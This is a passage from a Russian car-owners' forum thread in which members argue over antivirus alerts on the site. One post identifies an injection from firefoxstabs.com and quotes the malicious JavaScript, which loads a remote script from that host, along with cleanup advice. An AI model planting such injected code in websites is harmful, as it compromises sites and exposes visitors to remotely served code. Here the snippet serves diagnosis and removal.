virus

selp

New Member
Сообщения
7
Благодарности
0
Адрес
Магадан
Авто
3,3 4WD 2007
#31
На работе WinXP и Касепер 6.0 корпоративный, все лицензионное. Дома Vista и KIS-2010, с последними базами.
Тоже Касперский ругается и дома и на работе, на работе даже повисает когда на форум захожу.
Что-то на сайте не в порядке. А не "у нас".
 

ASA

В думах.
Сообщения
2.177
Благодарности
7
Адрес
Москва
Авто
2,4. 2007.
#32
На работе WinXP и Касепер 6.0 корпоративный, все лицензионное. Дома Vista и KIS-2010, с последними базами.
Тоже Касперский ругается и дома и на работе, на работе даже повисает когда на форум захожу. Что-то на сайте не в порядке. А не "у нас".
Наверное мы(такие есть) на другой сайт ходим.
 

Zhuk

Well-Known Member
Сообщения
3.061
Благодарности
920
Адрес
Москва
Авто
Highlander, 2011, 3,5л
#33
На опыте. У сайта нет проблем. Проблемы у Вас. Но, если не хотите услышать, мне это не важно. У меня не прыгает и не ругается.
интересная позиция. она официальная или так, мнение юзера?
Ваш сайт мне, как пользователя тойоты-хайлендер, кажется наиболее информативным и интересным. Остальные ресурсы либо мертвые, либо, как тойота прадо клуб больше касаются других моделей и инфы по Хаю крайне мало.
Но проблемы периодически возникающие на сайте и их решение крайне затрудняют пользование данным ресурсом.
Если вам пох, то можете и дальше отвечать (решать, устранять) косяки в подобном ключе.
Но юзеров вы теряете.

пс. Лично ASA не хотел обидеть, т.к. не уверен что это его кредо решение проблем с сайтом.
 

Вложения

амчанин

Well-Known Member
Сообщения
2.897
Благодарности
950
Адрес
Новгород
Авто
2.4 монопривод
#35
Захожу на сайт через мозилу,ругается. Зашел через оперу тоже ругается Касперский.
 
Сообщения
90
Благодарности
0
Адрес
Minsk
Авто
3,0 AWD 2003
#37
На опыте. У сайта нет проблем. Проблемы у Вас. Но, если не хотите услышать, мне это не важно. У меня не прыгает и не ругается.
Со слухом у меня давно проблеммы. Особенно на мудрые теоретические советы. Жизнь научила. Предпочитаю на практике смотреть, щупать, нюхать... = что-то материальное надо.
 

samus

Админ(добрый)
Сообщения
16.027
Благодарности
5.518
Адрес
Москва
Авто
3.3 л 4WD 2003 г Был..
#38
Не надо ругаться. Проблемы есть, Андрюха работает, каждый день что-то новенькое. Радует только одно - пользователей эти его происки не заражают, только затрудняют работу и общение. Хочется Андрюхе пожелать.... Крепкого здоровья...
 
Сообщения
90
Благодарности
0
Адрес
Minsk
Авто
3,0 AWD 2003
#39
Не надо ругаться. Проблемы есть, Андрюха работает, каждый день что-то новенькое. Радует только одно - пользователей эти его происки не заражают, только затрудняют работу и общение. Хочется Андрюхе пожелать.... Крепкого здоровья...
Вроде пропало! Если надолго - респект админам. Жаль только, что долго. Много постов.
 

samus

Админ(добрый)
Сообщения
16.027
Благодарности
5.518
Адрес
Москва
Авто
3.3 л 4WD 2003 г Был..
#40

ASA

В думах.
Сообщения
2.177
Благодарности
7
Адрес
Москва
Авто
2,4. 2007.
#41
интересная позиция. она официальная или так, мнение юзера?
Ваш сайт мне, как пользователя тойоты-хайлендер, кажется наиболее информативным и интересным. Остальные ресурсы либо мертвые, либо, как тойота прадо клуб больше касаются других моделей и инфы по Хаю крайне мало.
Но проблемы периодически возникающие на сайте и их решение крайне затрудняют пользование данным ресурсом.
Если вам пох, то можете и дальше отвечать (решать, устранять) косяки в подобном ключе. Но юзеров вы теряете.
пс. Лично ASA не хотел обидеть, т.к. не уверен что это его кредо решение проблем с сайтом.
Честно, вот не понимаю я таких людей, как Вы. Чо смешивать юзеров, сайты и тд. Это моё мнение, такое же, как ваше. Не имхо, Касперский уже давно не лидер и известен своей глючностью. Плюс, все антивири(их файерволы) имеют настройки. Равно как и броузеры. Потрудитесь почитать, полистать. Снять не нужные "галочки". Именно, мне пох. Прежде чем, кого то обвинять, разберитесь со своим железом. Скрипты есть на любом ресурсе. В вашем скрине, только оговорка на вирус, какой где не понятно. Если бы сайт, был заражён, любой онлайн сканер, нашел бы вредоносные скрипты. Но их нет.
ЕЩЁ РАЗ ПОВТОРЯЮ, У МЕНЯ НЕ СКАЧЕТ И НЕ РУГАЕТСЯ. В СВОЁМ РЕШЕНИИ ПРОБЛЕМЫ, УВЕРЕН.
ПЫСЫ. Настройте вашу мозиллу и касперского правильно. Результат увидите сразу.
 

RoadLASER

Статский советчик
Сообщения
21.030
Благодарности
7.962
Адрес
Москва
Авто
Гибрид 2006
#43
У меня Лисица и НОД32. Никогда не ругался антивирь. А вот прыгать, да, прыгает периодами. Сейчас не прыгает.
 

ASA

В думах.
Сообщения
2.177
Благодарности
7
Адрес
Москва
Авто
2,4. 2007.
#44
Максим 25.05.2011 22:58
Группа: Посетители
Антивирус Касперского 2010 (9.0.0.736)
Товарищи, я вам так скажу! Мне довелось испытать на себе и касперский и eset nod32. С касперским ноутбук улетел за 3 месяца, при том что за все три месяца антивирус не нашел ни одного зараженного файла. Eset отработал свою лицензию и ещё 1,5 месяца находя время от времени вирусы и подсказывая об обновлениях. Он продлён. Я им доволен!
Адександр 24 rus 29.05.2011 17:00
Группа: Посетители
Антивирус Касперского 2010 (9.0.0.736)
Я полностью согласен с теми кто считает что каспер га..о-этот <<АНТИВИРУС>> реально портит систему и мешает заходить в инет.
Мария 7.06.2011 10:17
Группа: Посетители
Антивирус Касперского 2010 (9.0.0.736)
у меня Касперский ставил програмист сказала очень хороший!! ага хороший... делаю полную проверку на 10% начинает глючит , не одна программа не отвечает приходиться перезагружать комп .. ПОДСКАЖИТЕ ЧТО ДЕЛАТЬ????
ТОХА 16.06.2011 09:57
Группа: Посетители
Антивирус Касперского 2011
Лагает кагбуто вирус в системе вирус ито так не лагает как касперский антивирус
 

RoadLASER

Статский советчик
Сообщения
21.030
Благодарности
7.962
Адрес
Москва
Авто
Гибрид 2006
#45
Да фигли тут рассуждать? Я много чего перепробовал за 15 лет в инете. Лучше Есета ничего нет, однозначно. Каждый год покупаю официальное продление и не парюсь. А с Касперским 2 раза когда-то терял всю инфу на компе. Кстати, Маккафи такое-же дерьмо, поэтому, купив недавно жене супернавороченный нотик, первым делом снес установленный там Маккафи и поставил Есет.
 

maart

Новичок
Сообщения
46.322
Благодарности
29.175
Адрес
понаехаловск-нерезиновск
Авто
3.0 AWD, Tesla Y, Norco
#47
плюсану Сергею. кошмарского - в топку, многие проги он распознаёт как вирусоносителей. при этом мой провайдер утверждал, что у меня всё чисто. макафи снёс вместе с виндой жене - тоже поставил нод32.
 
Сообщения
90
Благодарности
0
Адрес
Minsk
Авто
3,0 AWD 2003
#49
Если кому-то вьедут в зад, то надо смотреть настройки тормозов в своей(!) машине. Если поймал открытый люк - не дорожники этого участка виноваты, а плохо были установлены развал-схождение.
АРИГИНАЛЬНА!!!
"Почему на другие сайты не ругается" осталось вне поля зрения.
Топик закрываем. Не ругается уже.
Всем спасибо. Все свободны.
ВСЕ!!!!!!!!!!!!
 
Последнее редактирование:

Efima

2,4 4WD 2005
Сообщения
278
Благодарности
0
Адрес
Химки
Авто
2,4 4WD 2005
#50
Честно, вот не понимаю я таких людей, как Вы. Чо смешивать юзеров, сайты и тд. Это моё мнение, такое же, как ваше. Не имхо, Касперский уже давно не лидер и известен своей глючностью. Плюс, все антивири(их файерволы) имеют настройки. Равно как и броузеры. Потрудитесь почитать, полистать. Снять не нужные "галочки". Именно, мне пох. Прежде чем, кого то обвинять, разберитесь со своим железом. Скрипты есть на любом ресурсе. В вашем скрине, только оговорка на вирус, какой где не понятно. Если бы сайт, был заражён, любой онлайн сканер, нашел бы вредоносные скрипты. Но их нет.
ЕЩЁ РАЗ ПОВТОРЯЮ, У МЕНЯ НЕ СКАЧЕТ И НЕ РУГАЕТСЯ. В СВОЁМ РЕШЕНИИ ПРОБЛЕМЫ, УВЕРЕН.
ПЫСЫ. Настройте вашу мозиллу и касперского правильно. Результат увидите сразу.
"Если у тебя нет проблем и врагов, значит ты еще не родился." (С) не мой.
Каспер ругается не на вирусы или трояны на самом сайте, а на УРЛ-ссылки на вредоносный сайт firefoxstabs_com.
Поиск по слову "firefoxstabs" даст кучу информации к размышлению.
Например:

firefoxstabs.com заражает файлы *.js и *.php. Проверьте все файлы на наличие данного кода и удалите, где он есть

JavaScript:
document.write(''+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});
Как показал поиск в Инете дело обстоит довольно серьезно, очень
много сайтов в сети уже заражены
Приветик:
2011/05/08 в 19:35
Да сегодня тоже попала эта гадость ко мне.
Заразил и вордпресовский сайт (залез в index.php)
и smf форум (влез в index.php опять же)
Обратил внимание, что заметить этот глюк можно в файрфоксе:
При просмотре форума или страницы, например нажав page down страница опускается в низ, а потом опять перескакивает наверх. Так же на страницах будто мигает какая то хрень вроде всплывающего окна слева, но неуспеваешь заметить, что это такое. Я это сразу заподозрил, полазил по файлам и нашел внизу этот скрипт, в котором есть слово «firefoxstabs». По поиске в Яндексе и забрёл на этот сайт.
Как удалить подарок от firefoxstabs.com?
1. Я залил все файлы к себе (как вариант написать скрипт поиска по серверу нужного куска текстовой строки и вырезать прям там) и поиском нашел все что было с заразой, примерно 20 файлов js (в теме уже поправил 3 итого 23)
2. Почистил все на хостинге
3. Поменял пароль на ftp, если этого не сделать то раз в 2-3 дня ждите возрождения всего что удалил
Так что, господа хранители административного доступа к контенту, ищите заразу у себя на компе и почаще меняйте пароль.
Хотя, может и хостер накосячил.
Судя по всему, эпидемия уже прошла, это просто ее отголоски, и хозяин соседнего "колхоза" тут вряд ли причем.
 
Последнее редактирование:

samus

Админ(добрый)
Сообщения
16.027
Благодарности
5.518
Адрес
Москва
Авто
3.3 л 4WD 2003 г Был..
#51
Efima, спасибо за политинформацию! Так уж у нас устроено, что "смотрящий" сисадмин не всегда имеет возможность ежедневно наблюдать за нашим сайтом. Из админов только он входит в панель управления на хосте. Поэтому устранение "косяков" не всегда бывает оперативным... (После твоих объяснений Андрюху из списка подозреваемых вычеркиваем :) )
 

ASA

В думах.
Сообщения
2.177
Благодарности
7
Адрес
Москва
Авто
2,4. 2007.
#52
"Если у тебя нет проблем и врагов, значит ты еще не родился." (С) не мой.
Каспер ругается не на вирусы или трояны на самом сайте, а на УРЛ-ссылки на вредоносный сайт firefoxstabs_com.
Поиск по слову "firefoxstabs" даст кучу информации к размышлению.
Например: Так что, господа хранители административного доступа к контенту, ищите заразу у себя на компе и почаще меняйте пароль.
Хотя, может и хостер накосячил. Судя по всему, эпидемия уже прошла, это просто ее отголоски, и хозяин соседнего "колхоза" тут вряд ли причем.
Всё правильно, в случае с повальными алармами на сайт. Но, такое только у единиц. Соответственно не применимо. Либо, у тех юзеров которые видят алармы, уже была заражена машина.
 

Efima

2,4 4WD 2005
Сообщения
278
Благодарности
0
Адрес
Химки
Авто
2,4 4WD 2005
#53
Всё правильно, в случае с повальными алармами на сайт. Но, такое только у единиц. Соответственно не применимо. Либо, у тех юзеров которые видят алармы, уже была заражена машина.
Реальной угрозы заражения локальных компьютеров нет. Есть ссылка на другой сайт, считающийся потенциально опасным.
Поэтому какие-то антивирусы (касперский в данном случае) бьют в колокола, а другие пропускают молча.
Плюс, как я понял, эпидемия, связанная с firefoxstabs_com началась не так давно, и антивирусы, базы которых давно не обновлялись, вообще не реагируют.
Локальные компы не заражаются, заражаются сайты. Как результат - прыгающие экраны и потеря информации.
 
Последнее редактирование:

ASA

В думах.
Сообщения
2.177
Благодарности
7
Адрес
Москва
Авто
2,4. 2007.
#55
Уверен, весь этот "силос" конфликтует сам с собой и систему тормозит жутко, ресурсы сжирают на раз. Особенно Др.Вэб тормоза такие включал, пока не снёс нафик его.
 

maart

Новичок
Сообщения
46.322
Благодарности
29.175
Адрес
понаехаловск-нерезиновск
Авто
3.0 AWD, Tesla Y, Norco
#56
понятно, это всё паранойа..
И как это ещё работало...
Скриншот сделан с ноутбука, который принесли для переустановки Виндамс. Никакого фотошопа.
 

RoadLASER

Статский советчик
Сообщения
21.030
Благодарности
7.962
Адрес
Москва
Авто
Гибрид 2006
#58
А я вот думаю, что, все-же, это акашка в состоянии химического возбуждения гадит.
 

ASA

В думах.
Сообщения
2.177
Благодарности
7
Адрес
Москва
Авто
2,4. 2007.
#59
Зарегиться под любым именем, проблем не составляет. А уж чо нить в php or html,java замастырить, ваще не проблема. даже если сам тугой, в тырнете этого добра валом.
 

Последние сообщения

Новые темы

Самое читаемое за 5 дней

Сверху